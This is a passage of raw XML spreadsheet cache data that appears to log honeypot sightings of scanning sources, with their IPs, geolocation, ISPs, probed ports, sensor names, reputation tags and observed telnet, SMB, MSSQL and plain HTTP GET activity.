    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;30229&amp;&amp;23&amp;&amp;38384&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7221:2296"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3806"/>
    <x v="3806"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:12:58"/>
    <d v="2025-03-31T17:58:20"/>
    <d v="2025-04-01T10:12:58"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="FA"/>
    <s v="Al Farwaniyah"/>
    <s v="NA"/>
    <s v="Al Farwānīyah"/>
    <s v="285815"/>
    <s v="NA"/>
    <s v="29.2775"/>
    <s v="47.9586"/>
    <s v="42961"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="cellular"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="2012-01-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2524:4f8d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3807"/>
    <x v="3807"/>
    <s v="125-229-190-215.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:08:17"/>
    <d v="2024-12-28T19:21:37"/>
    <d v="2025-04-01T10:08:17"/>
    <n v="287"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23&amp;&amp;25385&amp;&amp;60801&amp;&amp;60825&amp;&amp;49121&amp;&amp;60555&amp;&amp;60562&amp;&amp;9100&amp;&amp;80"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7de5:bed7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3808"/>
    <x v="3808"/>
    <s v="NA&amp;&amp;59-127-235-145.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T10:04:00"/>
    <d v="2024-12-16T14:43:47"/>
    <d v="2025-04-01T10:04:00"/>
    <n v="216"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;50994&amp;&amp;54198&amp;&amp;54202&amp;&amp;40319&amp;&amp;40334&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:eb91"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3809"/>
    <x v="3809"/>
    <s v="NA&amp;&amp;59-126-80-9.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T09:50:38"/>
    <d v="2024-04-10T13:08:00"/>
    <d v="2025-04-01T09:50:38"/>
    <n v="265"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;58257&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7e:5009"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3810"/>
    <x v="3810"/>
    <s v="220-134-152-134.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:48:59"/>
    <d v="2024-03-14T09:33:47"/>
    <d v="2025-04-01T09:48:59"/>
    <n v="208"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6432&amp;&amp;23&amp;&amp;17332&amp;&amp;9100&amp;&amp;NA"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc86:9886"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3811"/>
    <x v="3811"/>
    <s v="59-127-129-13.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:45:45"/>
    <d v="2023-10-19T02:47:41"/>
    <d v="2025-04-01T09:45:45"/>
    <n v="7442"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;37266&amp;&amp;23&amp;&amp;80&amp;&amp;37325&amp;&amp;37337&amp;&amp;37362&amp;&amp;37372&amp;&amp;NA&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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3b7f:810d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3812"/>
    <x v="3812"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:45:17"/>
    <d v="2024-03-18T15:09:41"/>
    <d v="2025-04-01T09:45:17"/>
    <n v="110"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;22&amp;&amp;32779&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="GUA"/>
    <s v="Guanajuato"/>
    <s v="León"/>
    <s v="León"/>
    <s v="3998655"/>
    <s v="NA"/>
    <s v="21.1291"/>
    <s v="-101.674"/>
    <s v="13999"/>
    <s v="Mega Cable, S.A. de C.V."/>
    <s v="Mega Cable, S.A. de C.V."/>
    <s v="residential"/>
    <s v="Mega Cable, S.A. de C.V"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3290)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3371)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,27020)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,27064)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3761)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3806)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,37408)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,8649)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,14170)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,29913)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,56778)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,23707)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,50316)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,50394)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,28064)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,56379)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,49990)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,4449)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,8037)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,8061)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3807)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3841)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,25332)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,25404)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,1117)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,11480)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b1e5:43e7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3813"/>
    <x v="3813"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:44:55"/>
    <d v="2025-04-01T09:44:55"/>
    <d v="2025-04-01T09:44:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:1b03"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3814"/>
    <x v="3814"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:42:13"/>
    <d v="2025-04-01T09:40:07"/>
    <d v="2025-04-01T09:42:13"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ef9:722b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3815"/>
    <x v="3815"/>
    <s v="node-t6f.pool-101-108.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-01T09:38:40"/>
    <d v="2025-04-01T09:38:40"/>
    <d v="2025-04-01T09:38:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Thawi Watthana"/>
    <s v="Thawi Watthana"/>
    <s v="7026994"/>
    <s v="NA"/>
    <s v="13.7885"/>
    <s v="100.333"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="consumer"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-01-17 03:50:09"/>
    <s v="2026-01-17 03:50:09"/>
    <s v="2025-01-20 03:36:34"/>
    <s v="['NS1.TOTONLINE.NET', 'NS2.TOTONLINE.NET']"/>
    <s v="GMO Internet, Inc."/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:656c:93b7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3816"/>
    <x v="3816"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T09:29:28"/>
    <d v="2025-04-01T09:27:31"/>
    <d v="2025-04-01T09:29:28"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
